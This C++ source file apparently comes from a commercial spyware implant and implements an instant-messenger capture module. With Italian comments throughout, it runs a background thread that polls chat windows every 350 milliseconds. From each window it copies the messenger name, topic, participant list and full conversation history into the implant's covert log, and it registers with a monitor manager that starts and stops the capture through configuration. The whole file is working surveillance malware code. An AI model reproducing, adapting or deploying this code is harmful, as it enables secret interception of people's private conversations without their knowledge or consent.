#include "HM_IMAgent\QMessengerAgent.h"

#define IM_CAPTURE_INTERVAL 350 // in millisecondi

BOOL bPM_IMStarted = FALSE; // Flag che indica se il monitor e' attivo o meno
BOOL bPM_imcp = FALSE; // Semaforo per l'uscita del thread
HANDLE hIMThread = NULL;

// Logga il contenuto delle finestre di IM
void GetIM(QMessengerAgent *ma)
{
	PWCHAR wHistory;
	UINT i;

	ma->UpdateWindowList();
	for(i = 0; i < ma->GetListLength(); i++, ma->Next()){
		if(ma->IsUpdated()){
			if ( (wHistory = ma->GetHistory()) == NULL )
				continue;

			bin_buf tolog;
			struct tm tstamp;
			DWORD delimiter = ELEM_DELIMITER;
			GET_TIME(tstamp);
			tolog.add(&tstamp, sizeof(tstamp));
			tolog.add(ma->GetMessengerName(), (wcslen(ma->GetMessengerName())+1)*sizeof(WCHAR));
			tolog.add(ma->GetTopic(), (wcslen(ma->GetTopic())+1)*sizeof(WCHAR));
			tolog.add(ma->GetUsers(), (wcslen(ma->GetUsers())+1)*sizeof(WCHAR));
			tolog.add(wHistory, (wcslen(wHistory)+1)*sizeof(WCHAR));
			tolog.add(&delimiter, sizeof(DWORD));
			LOG_ReportLog(PM_IMAGENT, tolog.get_buf(), tolog.get_len());

			ma->ChatAcquired();
		}
	}
}

DWORD WINAPI IMCaptureThread(DWORD dummy)
{
	QMessengerAgent ma;
	LOOP {
		GetIM(&ma);
		RET_CANCELLATION_POINT(bPM_imcp);
		Sleep(IM_CAPTURE_INTERVAL); 
	}
}


DWORD __stdcall PM_IMStartStop(BOOL bStartFlag)
{
	DWORD dummy;

	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_IMStarted == bStartFlag)
		return 0;

	// I log va inizializzato come prima cosa...
	if (bStartFlag && !LOG_InitAgentLog(PM_IMAGENT))
		return 0;

	bPM_IMStarted = bStartFlag;

	if (bStartFlag) {
		// Crea il thread che esegue gli IM
		hIMThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)IMCaptureThread, NULL, 0, &dummy);
	} else {
		// All'inizio non si stoppa perche' l'agent e' gia' nella condizione
		// stoppata (bPM_IMStarted = bStartFlag = FALSE)
		QUERY_CANCELLATION(hIMThread, bPM_imcp);
		// chiude il logging (come ultima cosa)
		LOG_StopAgentLog(PM_IMAGENT);
	}

	return 1;
}


DWORD __stdcall PM_IMInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	PM_IMStartStop(bStartFlag);
	return 1;
}


void PM_IMRegister()
{
	// Non ha nessuna funzione di Dispatch
	AM_MonitorRegister(PM_IMAGENT, NULL, (BYTE *)PM_IMStartStop, (BYTE *)PM_IMInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_IMInit(NULL, FALSE);
}